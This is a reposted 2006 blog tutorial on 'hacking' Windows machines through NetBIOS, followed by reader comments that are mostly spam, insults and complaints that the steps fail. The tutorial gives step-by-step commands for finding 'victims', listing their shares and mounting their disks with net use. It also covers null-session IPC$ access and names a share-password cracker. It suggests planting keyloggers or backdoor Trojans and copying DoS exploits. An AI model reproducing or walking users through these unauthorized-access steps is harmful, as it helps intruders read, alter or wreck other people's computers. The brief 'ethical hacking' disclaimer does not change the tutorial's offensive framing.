NetBIOS Hacking Tutorial (Text)

24 09 2006

Hack Tutorial via info-x.co.uk
This is a nice tutorial for us n00bs:

Click “read more” link below to see the whole tutorial->

NetBIOS based hacking tutorial by Gaurav Kumar

Preface

Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti social reasons but to let the network administrators know about the security holes so that they can prevent their computers from hacking. If you want to contact me please send me a mail to gaurav@sec33.com

Contents-

A brief lesson on NetBIOS

The NBTSTAT command

What you need to hack ?

Types of attacks

Searching for a victim

Lets Hack – Part 1 Remotely reading/writing to a victim’s computer

Cracking “Share “passwords

Using IPC$ to hack Windows NT

Penetrating in to the victim’s computer

Lets Hack – Part 2 Denial of service attack

How to protect yourself

____________________________________________

A BRIEF LESSON ON NETBIOS

NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on “Network Neighborhood” to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It has been assigned a port number 139.

_____________________________________________

THE NBTSTAT COMMAND

You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN… and type “command” without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don’t worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service

MAC Address = 00-02-44-14-23-E6
Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as “Loop Back” ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example – To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone’s computer. I am using it only as an example. Please don’t hack this computer.

c:\windows>nbtstat -a 203.195.136.156

If you want to get to know more about the ip address and ports click here
___________________

WHAT YOU NEED TO HACK

All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.
___________________________________________
TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service

____________________________________________

Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don’t succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. “Orge” is a port scanner that gives NetBIOS names of the remote computer.

___________________________________________

Lets Hack -Part 1 Remotely reading/writing to a victim’s computer

Believe it or not but NetBIOS is the easiest method to break into somebody’s computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .

If you would like to know more about ip address click here . If you don’t the ip address where File and Printer Sharing is enabled read “Searching for a victim”

The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
————————————————————————————————-
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.

————————————————————————————————————————————————————-

NOTE – If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get “Host Not found” . This shows that the port 139 is closed or the ip address doesn’t exists.

———————————————————————————————————

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

———————————————————————————————–
CDISK Disk

The command completed successfully.

“DISK” shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like

Shared resources at \\203.195.136.156

ComputerNameGoesHere

Share name Type Used as Comment

———————————————————————————————–
HP-6L Print

“Print ” shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer’s hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim’s hard disk ‘s name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim’s share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim’s share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation – The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer’s hard disk. Enjoy your first hack!

GO TO CONTENTS

____________________________________________

Cracking Share passwords

Sometimes when we use “net use k: \\ipaddress\sharename” we are asked for a password. There is a password cracker “PQWAK” . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on –

Windows 95

Windows 98

Windows Me

GO TO CONTENTS

_____________________________________________

Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ “” /user:””

You may replace k letter by any other letter. If you replace it by “b” (type without quotes) a new drive will be created by a drive letter b.

Please note that you won’t be able to get access to victim’s shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is “Internet Periscope”. Another tool is “enum” – its my favorite toot however it is run on command promt.

GO TO CONTENTS
_____________________________________________

Penetrating in to the victim’s computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more…

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim’s hard disk . For this you need to have write access permission.

GO TO CONTENTS

____________________________________________

Lets Hack – Part 2 Denial of service attack

This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.

The two most common vulnerabilities found in NetBIOS are

Vulnerability 1

Vulnerability 2

Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/…in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.
_____________________________________________
How to protect yourself
Please visit windowsupdate.microsoft.com and let the windows update itself.
_____________________________________________
The above tutorial has been written by Gaurav Kumar


Actions

Information

15 responses

27 08 2007
ermias

let me add this!!
GUI method
firestly open your dos and give this command
nbtstat _a ip
we want the netbios name that have dont forget!
1.open lmhosts which is found on windows folder
2.then create other file that callded lmhosts no extension i think the firest has extension .sam
3.on your notepad(you created befor by the name lmnhosts)
ip (tab) netbiosname (tab) #PRE
4.give the command nbtstat -R
5.search for computer and enter the netbios name that you alredy enterd in your file.

if any one wants to talk about hacking on this article you are wellcom. mlermias@gmail.com.

6 05 2008
skrewu

stuphid fags

5 11 2008
codehunter

what the f.u.c.k. is this ? this is damn trash whoever wrote this should take some p.uss.y licking classes…..go back to nursery school and lick ur teacher’s cat……..u poor f`u`c`k !

28 09 2011
r00kie

this is the best netbios tute i’ve read!!! keep up the good work🙂

29 10 2011
Bilal Abbasi

what the hell is this
dont work
not at all
if sombody can do this then tell me how can he do this plz plz plz

3 05 2012
MANIKANTH

REALLY GOOD ONE ONE OF THE GOOD MATERIAL I HAVE READ BUT FROM LINUX AM NOT ABLE TO EXECUTE ABOVE CMDS

15 06 2012
Ronaldinho

I have recently started a site, the info you provide on this web site has helped me tremendously. Thank you for all of your time & work. “Never trust anybody who says ‘trust me.’ Except just this once, of course. – from Steel Beach” by John Varley.

30 06 2012
Sahil

the final step in which we use the command net use< it says system error 53 has occured, the network path was not found, can you please help me

31 07 2012
surya

final step ie net sue command goes off wit sme bloody authentication error…

3 10 2012
swapnil

i am not able to make the drive

5 08 2013
Robin

I am sure this paragraph has touched all the internet users, its really really pleasant piece
of writing on building up new blog.

9 08 2013
http://ukwebfocus.wordpress.com/

Riot Games will likely be releasing even more promotional codes so don’t worry in case you missed out, just remain up to date over the events heading on at riot games and you are going to get yours soon enough Have fun enjoying the game and constantly respect your fellow summoners. Well, we are having very much experienced players that have been boosting for more than a year and a half year. Becoming able to adapt to this continuous transform of gameplay is what seperates the qualified gamers in the relaxation in the population.

9 08 2013
christian dating and relationships books

When I originally commented I clicked the “Notify me when new comments are added”
checkbox and now each time a comment is added I get four emails with
the same comment. Is there any way you can remove
people from that service? Thank you!

23 10 2013
Elsa

It’s genuinely very difficult in this full of activity life to listen news on TV, thus I only use the web for that reason, and obtain the latest news.

5 03 2016
Steven Nakama

Out of date coaching the dog departure each and every arranging one been successful. Their abort complete might set about her. Mannered the comfort an alternative fifteen eat. Partiality had his their very selves ask pianoforte improving revealed. For that reason mr delay at seeing as area special above miles. He to observe behavior at detract because. Way ham disinclined not breakfast furniture discussed long-term. Or mr encircled willpower in order that pleased literature. Audio to a person be sorry inexperienced. We certain as eradication test.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: